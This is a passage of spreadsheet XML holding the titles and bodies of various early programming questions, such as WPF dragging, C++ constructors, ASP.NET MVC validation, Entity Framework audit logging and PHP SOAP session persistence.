&lt;p&gt;Now the flag, which is my sharding criterium, changes and I want to know the best way to deal with this case. If I'd just keep the record in its original database, eventually all data would accumulate in a single table.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dragging an image in WPF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a WPF application where I can drag an image around.&lt;/p&gt;
&lt;p&gt;Currently I have an image placed in the center of the window, and I'm thinking of using the three mouseevents MouseDown, MouseMove and MouseUp to calculate the new position when dragging the image.&lt;/p&gt;
&lt;p&gt;Are there any other good ideas on how to do this? I'm totally new to WPF so my mindset is still in the Windows Forms world.&lt;/p&gt;
&lt;p&gt;As far as I can see I need to use a 
in order to have absolute positioning available.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I retrieve an HTML element's actual width and height?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose that I have a &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; that I wish to center in the browser's display (viewport). To do so, I need to calculate the width and height of the &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; element. &lt;/p&gt;
&lt;p&gt;What should I use? Please include information on browser compatibility.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you call a constructor for global objects, for arrays of objects, and for objects inside classes/structs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would you call the constructor of the following class in these three situations: Global objects, arrays of objects, and objects contained in another class/struct?&lt;/p&gt;
&lt;p&gt;The class with the constructor (used in all three examples):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Foo {
    public:
        Foo(int a) { b = a; }
    private:
        int b;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And here are my attempts at calling this constructor:&lt;/p&gt;
&lt;h2&gt;Global objects&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;Foo global_foo(3); // works, but I can't control when the constructor is called.
int main() {
    // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Arrays of objects&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;int main() {
    // Array on stack
    Foo array_of_foos[30](3); // doesn't work
    // Array on heap
    Foo *pointer_to_another_array = new Foo(3) [30]; // doesn't work
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There I'm attempting to call the constructor for all elements of the arrays, but I'd also like to know how to call it on individual elements.&lt;/p&gt;
&lt;h2&gt;Objects contained in classes/structs&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;class Bar {
    Foo foo(3); // doesn't work
};
int main() {
    Bar bar;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I get the mouse button pressed from a command event in XUL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems that the XUL &lt;em&gt;command&lt;/em&gt; and &lt;em&gt;click&lt;/em&gt; events are somewhat different.&lt;/p&gt;
&lt;p&gt;Although my function does get called when using the &lt;em&gt;command&lt;/em&gt; event, the event object does not contain the &lt;em&gt;button&lt;/em&gt; property.&lt;/p&gt;
&lt;p&gt;My question is: &lt;strong&gt;how do I detect what mouse button that was pressed without using the &lt;em&gt;click&lt;/em&gt; event?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The simplest code that can demonstrate my problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0"?&amp;gt;
&amp;lt;?xml-stylesheet href="chrome://global/skin/" type="text/css"?&amp;gt;
&amp;lt;window id="yourwindow" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"&amp;gt;
&amp;lt;script language="JavaScript"&amp;gt;
    var showMeTheButton=function(e)
    {
        alert(e.button);
    }
&amp;lt;/script&amp;gt;
&amp;lt;button onclick="showMeTheButton(event)" label="Click me with onclick"&amp;gt;&amp;lt;/button&amp;gt;
&amp;lt;button oncommand="showMeTheButton(event)" label="Click me with oncommand"&amp;gt;&amp;lt;/button&amp;gt;
&amp;lt;/window&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>NHibernate, Codesmith and project physical architecture</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently I tried CodeSmith templates for NHibernate. As many of you might watched, there is a video explaining how to create a Petshop.Data using these templates. My question is what is the correct architecture in this approach? Should we have a BLL (or Services) layer to interact with this Petshop.Data or directly call ManagerFactory in our presentation layer? Also should our presentation layer be unaware of Business Objects in our Petshop.Data and shoud we have Business Entities in BLL again?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find userid by login (Python under *NIX)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to set my process to run under 'nobody', I've found os.setuid(), but how do I find &lt;code&gt;uid&lt;/code&gt; if I have &lt;code&gt;login&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;I've found out that uids are in /etc/passwd, but maybe there is a more pythonic way than scanning /etc/passwd. Anybody?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some techniques for code generation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm generating C++ code, and it seems like it's going to get very messy, even my simple generating classes already have tons of special cases.  Here is the code as it stands now: &lt;a href="http://github.com/alex/alex-s-language/tree/local%2Fcpp-generation/alexs_lang/cpp" rel="nofollow"&gt;http://github.com/alex/alex-s-language/tree/local%2Fcpp-generation/alexs_lang/cpp&lt;/a&gt; .&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm to match preferred partners into groups of three</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's a good algorithm to solve this problem?&lt;/p&gt;
&lt;p&gt;I have three groups of people - group A, group B, and group C. There are the same number of people in each group. They each have a list of people in the other groups that they're willing to work with. I want to group all these people together in groups of 3 (one from A, one from B, and one from C) such that everyone in a group wants to work with the other people in their group. &lt;/p&gt;
&lt;p&gt;How can I find these groups in a fast way? If there's no way to make everyone happy, then the algorithm should first make as many groups have three people who want to work with each other, and then make as many people in the other groups happy.&lt;/p&gt;
&lt;p&gt;One final point: people agree on who they want to work with (if person x wants to work with person y, then y also wants to work with x). If you could also give a big-O of the running time of your algorithm, that'd be great!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to improve performance of an Abstract Factory when all the time appears to be spent in memory allocation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The application de-serializes a stream into dynamically allocated objects and then keeps base type pointers in a linked list (i.e. abstract factory).  It's too slow.  Profiling says all the time is spent in &lt;code&gt;operator new&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Notes: The application already uses a custom memory allocator that does pooling.  The compiler is VC++ 6.0 and the code uses the old RogueWave collections rather than the STL.&lt;/p&gt;
&lt;p&gt;The only idea I have right now is to introduce Object Pooling.  I'd maintain large collections of pre-allocated objects for each type and re-use them.  But this will be a lot of work in this old code, and I'm not yet sure there's enough re-use that it would even help.  I was hoping someone smarter than me has an idea.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does ASP.NET MVC communicate w/ an AJAX enabled webpage?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How does the data go from the MVC to the browser and back again?   Does it use Microsoft's own technology like ASMX or WCF or something completely different?  &lt;/p&gt;
&lt;p&gt;This sounds like MVC is using a ASMX Web Service they are using but I can't seem to find any documentation which gives the real answer.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you show animated gifs with .NET Compact Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to display an animated gif on a .NET Compact &lt;code&gt;Form&lt;/code&gt;.
Currently I use a &lt;code&gt;PictureBox&lt;/code&gt; control and toggle between 
&lt;code&gt;.Visible = true&lt;/code&gt; and &lt;code&gt;.Visible = false&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;After &lt;code&gt;.Visible = true&lt;/code&gt; the gif is shown however it's not animated. How can I get the .NET Compact Framework to animate it?&lt;/p&gt;
&lt;p&gt;I already tried &lt;a href="http://stackoverflow.com/questions/165735/how-do-you-show-animated-gifs-on-a-windows-form-c"&gt;this&lt;/a&gt; but it doesn't work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC - User Input and Service/Repository - Where to do Validation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This might be too opinionated a question, but looking for help!&lt;/p&gt;
&lt;p&gt;I have been trying to refine my ASP.NET MVC program structure.  I just started using it at preview 5 and it is my first foray into business application development -- so everyting is new!&lt;/p&gt;
&lt;p&gt;At the controller level, I have a service object responsible for talking to the repository and taking care of all business logic.  At the action level, I have an object that holds all view data -- user input and generated output -- that I'll call view object (is there a general term for this?).  Unlike most examples I see, this object is not a database object, but an object specific to the view.&lt;/p&gt;
&lt;p&gt;So now I want to add user validation.  The problem is, I'm not sure where to put it.  It makes the most sense to me to do it in the Service layer.  The Service layer is responsible for all the business logic and validation is business logic.  On the other hand, most validation frameworks that I see are for validating an object, which makes me think the view object should be validation aware.  Finally, there are some validation methods that would require a database connection (checking if a user input field has a corresponding database record for example), and the view object has no concept of a database, only the Service.&lt;/p&gt;
&lt;p&gt;So some options I see are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Do validation in the Service.Method on the parameters passed to the method.&lt;/li&gt;
&lt;li&gt;Do validation in the view object before calling Service.Method.&lt;/li&gt;
&lt;li&gt;Do validation in the view object but make the Service.Method require a view object reference so it is initiating the validation on the object.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm sure there are more.  I'm curious of how other people handle user input validation in the MVC sense.  I've previously used the Enterprise Validation Block and liked being able to use stock validators for everything, but I'm not sure how to make it fit into a seperate view object and service layer.  It would be easy if they (view object / service) were the same object, which is maybe what people do?  Like I said, its all new to me and I'm looking for best practice / patterns.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pycurl WRITEDATA WRITEFUNCTION collision/crash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I turnoff WRITEFUNCTION and WRITEDATA?&lt;/p&gt;
&lt;p&gt;Using pycurl I have a class call curlUtil. In it I have pageAsString (self, URL) which returns a string. &lt;/p&gt;
&lt;p&gt;To do this I setopt WRITEFUNCTION. Now in downloadFile (self, URL, fn, overwrite=0) I do an open and self.c.Setopt (pycurl.WRITEFUNCTION, 0) which cause problems. Int is not a valid argument. &lt;/p&gt;
&lt;p&gt;I then assumed WRITEDATA would overwrite the value or there would be a NOWRITEFUNCTION commend. NOWRITEFUNCTION didn't exist so I just used WRITEDATA and Python crashed. &lt;/p&gt;
&lt;p&gt;I wrote a quick func called reboot() which closes curl, opens it again, and calls reset to put it in the default state. I call it in both pageAsString and downloadFile and there is no problem at all. But, I don't want to reinitialize curl. There might be some special options I set. &lt;/p&gt;
&lt;p&gt;How do I turnoff WRITEFUNCTION and WRITEDATA?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Stomp and Apache ActiveMQ as reliable syslog</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of my programs requires a reliable way to log across unreliable network (ie internet). The sender or receiver may go offline any time and can come back later. But any message sent by client should not be missed. Obviously syslog does not fit the bill. I am exploring the use of messaging servers like Apache ActiveMQ instead of syslog. Message senders are in perl, ruby and c. So I have Stomp as the message transport. &lt;/p&gt;
&lt;p&gt;Does this serve my purpose? Is there any pitfall I am missing here?&lt;/p&gt;
&lt;p&gt;raj&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Embedding XULRunner application on Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;My goal is to get Limewire(JAVA) and Songbird(XULRunner) to run together.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I was thinking the best way is to run the XUL application(songbird) inside a JAVA swing panel. Is there another way?&lt;/p&gt;
&lt;p&gt;Would it be better or possible to have the GUI entirely in XUL, and then access my JAVA objects somehow?&lt;/p&gt;
&lt;p&gt;How would I go about doing this?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Requesting memory for your application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having a similar issue to &lt;a href="http://stackoverflow.com/questions/28387/sql-server-2k5-memory-consumption"&gt;this person&lt;/a&gt;.  The primary difference being the application is NOT meant for a developer environment, and therefore I need to know how to optimize the space used by Sql Server (possibly per machine based on specs).&lt;/p&gt;
&lt;p&gt;I was intrigued by &lt;a href="http://stackoverflow.com/users/10795/ricardo-c"&gt;Ricardo C's&lt;/a&gt; answer, particularly the following:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Extracted fromt he SQL Server
  documentation:&lt;/p&gt;
  &lt;p&gt;Maximum server memory (in MB)&lt;/p&gt;
  &lt;p&gt;Specifies the maximum amount of memory SQL Server can allocate when it
  starts and while it runs. This
  configuration option can be set to a
  specific value if you know there are
  multiple applications running at the
  same time as SQL Server and you want
  to guarantee that these applications
  have sufficient memory to run. If
  these other applications, such as Web
  or e-mail servers, request memory only
  as needed, then do not set the option,
  because SQL Server will release memory
  to them as needed. &lt;strong&gt;However,
  applications often use whatever memory
  is available when they start and do
  not request more if needed&lt;/strong&gt;. If an
  application that behaves in this
  manner runs on the same computer at
  the same time as SQL Server, set the
  option to a value that guarantees that
  the memory required by the application
  is not allocated by SQL Server.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My question is: how does an application request memory from the OS when it needs it?  Is this something built into compilation or something managed by the developer?  The two primary apps running on this machine are Sql Server and the (fairly heavyweight) C# application I'm developing, and I'm almost certain we didn't specifically do anything in the realm of asking the OS for memory.  Is there a correct/necessary way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>c# Pre-processor directive scope</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to use: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#if
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to allow me to simulate potentially absent hardware during unit tests. What are the rules for using the &lt;code&gt;#define&lt;/code&gt; statements? &lt;/p&gt;
&lt;p&gt;i.e. what is its default scope? can I change the scope of the directive?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ mark as deprecated</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method in an interface that I want to deprecate with portable C++.
When I Googled for this all I got was a Microsoft specific solution; &lt;a href="http://msdn.microsoft.com/en-us/library/c8xdzzhh(VS.80).aspx"&gt;#pragma deprecated&lt;/a&gt; and &lt;a href="http://msdn.microsoft.com/en-us/library/044swk7y(VS.80).aspx"&gt;__declspec(deprecated)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;A second prize solution would be to ifdef a MSVC and a GCC solution.&lt;br&gt;
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass an unpersisted modified object from view back to controller without a form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;em&gt;Short:&lt;/em&gt; how does modelbinding pass objects from view to controller?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Long:&lt;/em&gt;&lt;br /&gt;
First, based on the parameters given by the user through a search form, some objects are retrieved from the database.
These objects are given meta data that are visible(but not defining) to the customer (e.g: naming and pricing of the objects differ from region to region).&lt;br /&gt;
Later on in the site, the user can click links that should show details of these objects.
Because these meta data are important for displaying, but not defining, I need to get the previously altered object back in the controller.
When I use the default asp.net mvc modelbinding, the .ToString() method is used. This off course doesn't return a relevant string for recreating the complete object.&lt;br /&gt;
I would have figured the ISerializable interface would be involved, but this is not so.
How should I go about to get the desired effect? I can't imagine I'm the first one to be faced with this question, so I guess I'm missing something somewhere...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I achieve uploading same files as a batch using jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When uploading some image/audio/video files in the same batch I want the file selected in the one field should not get accepted in the other buttons. How can I achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get SQL Server database folder of selected instance by using vbscript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assume that you have a running SQL Server Express instance named (local)\SQLEXPRESS. Its database folder is c:\program files\Microsoft SQL Server\MSSQL.1\MSSQL\Data. &lt;/p&gt;
&lt;p&gt;How can VBScript be used to retrieve that folder? &lt;/p&gt;
&lt;p&gt;Maybe by using SMO? And if so, how? &amp;lt;- Forget that. SMO uses .NET. Only possible in PowerShell.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;
The reason for this is, that I am developing an MSI setup that uses a custom action (call to a .NET based assembly) for attaching mdf Files to an existing SQL server instance. for this, the .mdf files get transferred from the installation medium to the hard drive. So the setup needs to know where to place the files.&lt;/p&gt;
&lt;p&gt;Since I would like to support the standards, I need to place the files into the common data folder.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;
When selecting a SQL server instance in InstallShield, the Property IS _ SQLSERVER _ SERVER is set with the instance name.&lt;/p&gt;
&lt;p&gt;I found out, that I can query the registry under HKLM\Software\Microsoft\Microsoft SQL Server\Instance Names\SQL to get the SQL name for the instance name (e.g. SQLEXPRESS -&gt; MSSQL.1).&lt;/p&gt;
&lt;p&gt;With this information, I can query HKLM\Software\Microsoft\Microsoft SQL Server\MSSQL.1\Setup to retrieve the SQLDataRoot key. When I append a \Data to the value found here, I have the folder, I was looking for. &lt;/p&gt;
&lt;p&gt;However, is there a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to call a Delphi DLL from VB6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given the following Delphil DLL declaration&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function csd_HandleData(aBuf: PChar; aLen: integer): integer; stdcall;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;what would be the VB6 declaration to use it?&lt;/p&gt;
&lt;p&gt;I've tried a variety of declarations, e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Declare Function csd_HandleData Lib "chsdet.dll" (ByVal aBuf As String, ByVal aLen As Integer)
Declare Function csd_HandleData Lib "chsdet.dll" (aBuf As Long, ByVal aLen As Integer)
Declare Function csd_HandleData Lib "chsdet.dll" (aBuf As Byte, ByVal aLen As Integer)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with the relevant code to suit the parameters, but nothing seems to work, i.e. the Delphi debugger says I have a too-largish value in aLen and a null string in aBuf.&lt;/p&gt;
&lt;p&gt;I am working toward using a TypeLib to drive the connection, but was prototyping with Declares.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>css layers ordering and arranging</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to have one one layer, and center images within. I.E., if I have 3 images and want 3 links beneath them, is there a way to do this without using a separate div tag for each link and image? To automatically make the links be centered under the images, and the images to be spaced evenly within a layer? &lt;/p&gt;
&lt;p&gt;I was also wondering how I would make the div show behind standard html if that is possible. I.E. if I have some text and a div over the text, the div will default show over the text, when I would like it to be behind. Is this only possible by using another layer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a partial class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is and how can it be used in C#.&lt;br/&gt;
Can you use the same concept in Python/Perl?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>what does this preg_replace_callback do in PHP? and how do I stop it leaking memory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a section of code on a b2evo PHP site that does the following: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$content = preg_replace_callback(
    '/[\x80-\xff]/',
    create_function( '$j', 'return "&amp;amp;#".ord($j[0]).";";' ),
    $content);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What does this section of code do? My guess is that it strips out ascii characters between 128 and 256, but I can't be sure. &lt;/p&gt;
&lt;p&gt;Also, as it stands, every time this bit of code is called from within a page, PHP allocates and then does not free upto 2K of memory. If the function is called 1000+ times on a page (this can happen), then the page uses an extra 2MB of memory. &lt;/p&gt;
&lt;p&gt;This is causing problems with my web application. Why am I losing memory, and how do I rewrite this so I don't get a memory leak?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Logging every data change with Entity Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a need from a customer to log every data change to a logging table with the actual user who made the modification. The application is using one SQL user to access the database, but we need to log the "real" user id.&lt;/p&gt;
&lt;p&gt;We can do this in t-sql by writing triggers for every table insert and update, and using context_info to store the user id. We passed the user id to a stored procedure, stored the user id in the contextinfo, and the trigger could use this info to write log rows to the log table.&lt;/p&gt;
&lt;p&gt;I can not find the place or way where or how can I do something similar using EF. So the    main goal is: if I make a change in the data via EF, I would like to log the exact data change to a table in a semi-automatic way (so I don't want to check for every field for  change before saving the object). We are using EntitySQL.&lt;/p&gt;
&lt;p&gt;Unfortunately we have to stick on SQL 2000 so the data change capture introduced in SQL2008 is not an  option (but maybe that's also not the right way for us).&lt;/p&gt;
&lt;p&gt;Any ideas, links or starting points?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;[Edit]&lt;/strong&gt;
Some notes: by using ObjectContext.SavingChanges eventhandler, I can get the point where I can inject the SQL statement to initialize the contextinfo. However I cannot mix the EF and the standard SQL. So I can get the EntityConnection but I cannot execute a T-SQL statement using it. Or I can get the connection string of the EntityConnection and create an SqlConnection based on it, but it will be a different connection, so the contextinfo will not affect the save made by the EF.&lt;/p&gt;
&lt;p&gt;I tried the following in the SavingChanges handler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;testEntities te = (testEntities)sender;
DbConnection dc = te.Connection;
DbCommand dcc = dc.CreateCommand();
dcc.CommandType = CommandType.StoredProcedure;
DbParameter dp = new EntityParameter();
dp.ParameterName = "userid";
dp.Value = textBox1.Text;
dcc.CommandText = "userinit";
dcc.Parameters.Add(dp);
dcc.ExecuteNonQuery();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Error: The value of EntityCommand.CommandText is not valid for a StoredProcedure command. 
The same with SqlParameter instead of EntityParameter: SqlParameter cannot be used.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;StringBuilder cStr = new StringBuilder("declare @tx char(50); set @tx='");
cStr.Append(textBox1.Text);
cStr.Append("'; declare @m binary(128); set @m = cast(@tx as binary(128)); set context_info @m;");
testEntities te = (testEntities)sender;
DbConnection dc = te.Connection;
DbCommand dcc = dc.CreateCommand();
dcc.CommandType = CommandType.Text;
dcc.CommandText = cStr.ToString();
dcc.ExecuteNonQuery();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Error: The query syntax is not valid.&lt;/p&gt;
&lt;p&gt;So here I am, stuck to create a bridge between Entity Framework and ADO.NET.
If I can get it working, I will post a proof of concept.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help with XML-RPC server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm now trying to create a xml-rpc server with the CodeIgniter Framework. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
$this-&amp;gt;load-&amp;gt;library('xmlrpc');
$this-&amp;gt;load-&amp;gt;library('xmlrpcs');
$config['functions']['weblogUpdates.ping'] = array('function' =&amp;gt; 'weblogUpdates.ping');
$config['functions']['ping'] = array('function' =&amp;gt; 'weblogUpdates.ping');
$config['functions']['weblogUpdates'] = array('function' =&amp;gt; 'weblogUpdates.ping');
$config['object'] = $this;
$this-&amp;gt;xmlrpcs-&amp;gt;serve();
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the problem I have is when Wordpress is trying to ping my file. I can't figure out what I should have as function in the $config['functions'][HERE];&lt;/p&gt;
&lt;p&gt;Anyone have a solution to this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.net remoting stops every 100 seconds</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have very strange problem, one of our applications is continually querying server by using .net remoting, and every 100 seconds the application stops querying for a short duration and then resumes the operation. The problem is on a client and not on the server because applications actually queries several servers in the same time and stops receiving data from all of them in the same time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do people use tarballs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a primarily Windows developer, perhaps I'm missing something cultural in the Linux community, but it has always confused me when downloading something that the files are first put into a .tar archive, then zipped.  Why the two step process?  Doesn't zipping achieve the file grouping? Is there some other benefit that I'm not aware of?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System.Random keeps on returning the same value</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a System.Random object which is instantiated with a fixed seed all thoughout the application. I am calling the NextDouble method and after some time passed I am getting 0.0 as result.&lt;/p&gt;
&lt;p&gt;Is there any remedy to this, has anyone else encountered this ?&lt;/p&gt;
&lt;p&gt;EDIT: I have one seed for the whole run which is set to 1000 for convience sake. The random.NextDouble is called several hundred thousand times. It is an optimizer application and could run for couple hours, but this actually happens after 10-0 mins of execution. I have recently added little bit more random calls to the app.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What harm can DBO do to a server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Aside from executing XP_CmdShell, which I have disabled in my SQL 2005 installation, what could a malicious user who gains DBO rights to my database do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;To my database,&lt;/li&gt;
&lt;li&gt;To my server?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm assessing the worst-case security risk of someone obtaining DBO to justify running a "least-privileged" user account in an application. Some allege that since we're not working with "confidential data" that the impact of someone gaining DBO is minimal.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I abort a running JDBC transaction?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to prematurely abort a transaction? Say, I have sent a command to the database which runs five minutes and after four, I want to abort it.&lt;/p&gt;
&lt;p&gt;Does JDBC define a way to send a "stop whatever you are doing on this connection" signal to the DB?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Visual Studio 2008 have integration with SourceSafe?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Visual Studio 2008 Professional Edition. In previous versions, there has been integration with VSS, through which one could "open from SourceSafe" and then, in the solution view, have the ability to interact with the source control by clicking on individual files. I seem to have some integration under 2008, namely there is a "Source Control" menu item under the File menu, but all I can do there is "Launch Microsoft Visual SourceSafe." How do I get the integration that I had in 2005?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stateful PHP Web Service Using SOAP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to implement a stateful web service in PHP using the SOAP extension. (Yes I know that web services are supposed to be stateless; all I really care to persist is some form of a session ID so I don't need to authenticate with every call to the service).  PHP.net's API documentation is somewhat lacking on this, and there isn't much else written on it.&lt;/p&gt;
&lt;p&gt;I found one page that discusses it (&lt;a href="http://bytes.com/forum/thread160816.html" rel="nofollow"&gt;http://bytes.com/forum/thread160816.html&lt;/a&gt;) and implemented the code as a test.  I built a small .NET application that consumes the web service and calls each function and displays the result.  From what I've read, the PHP SOAP extension will persist class variables between calls as long as the functionality is encapsulated in a class using the setClass() function and the setPersistence() function is passed SOAP_PERSISTENCE_SESSION.&lt;/p&gt;
&lt;p&gt;Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
class User 
{
    var $name = "Initial value";
    function setName($name) 
    {
    	$this-&amp;gt;name = $name;
    	// Tried this too.
    	// $this-&amp;gt;name = "Set to string constant" ;
    }
    function getName() 
    {
    	// This always returns "Initial value"
    	return $this-&amp;gt;name;
    }
}
// Tried placing session_start() in several places
// before $server-&amp;gt;handle()...
// One guy says this doesn't need to be called.
// I assume it depends on if session autostart is on.
session_start();
$server = new SoapServer(null, array('uri' =&amp;gt; 'http://localhost/'));
$server-&amp;gt;setClass('User');
$server-&amp;gt;setPersistence(SOAP_PERSISTENCE_SESSION);
$server-&amp;gt;handle();
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem I run into is that $name is not persisted between calls -- I always get the initialized value and not the value I assign to setName().  As I stated, I'm trying to persist a session ID after authenticating against a database -- if anyone has a better way to do this I'm open to suggestions; however, I would still like to solve the general case.  Anyone have any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I lock the first row and first column of a table when scrolling, possibly using JavaScript and CSS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I create a table that has its first row and first column both locked, as in Excel, when you activate 'freeze panes'?  I need the table to both scroll horizontally and vertically (a lot of solutions for this exist, but only allow vertical scrolling).&lt;/p&gt;
&lt;p&gt;So, when you scroll down in the table, the first row will stay put, since it will have the column headings.  This may end up being in a &lt;code&gt;thead&lt;/code&gt;, or it may not, whatever makes the solution easier.&lt;/p&gt;
&lt;p&gt;When you scroll right, the first column stays put, since it holds the labels for the rows.&lt;/p&gt;
&lt;p&gt;I'm pretty certain this is impossible with CSS alone, but can anyone point me toward a JavaScript solution?  It needs to work in all major browsers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Create a hidden transaction</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using C# and DSL Tools for VS2005. &lt;/p&gt;
&lt;p&gt;I need to create Transactions to change some data but i want them to be hidden from the user, that means, to not show in the UNDO list in VS2005.&lt;/p&gt;
&lt;p&gt;I tried by disabling the UndoManager&lt;/p&gt;
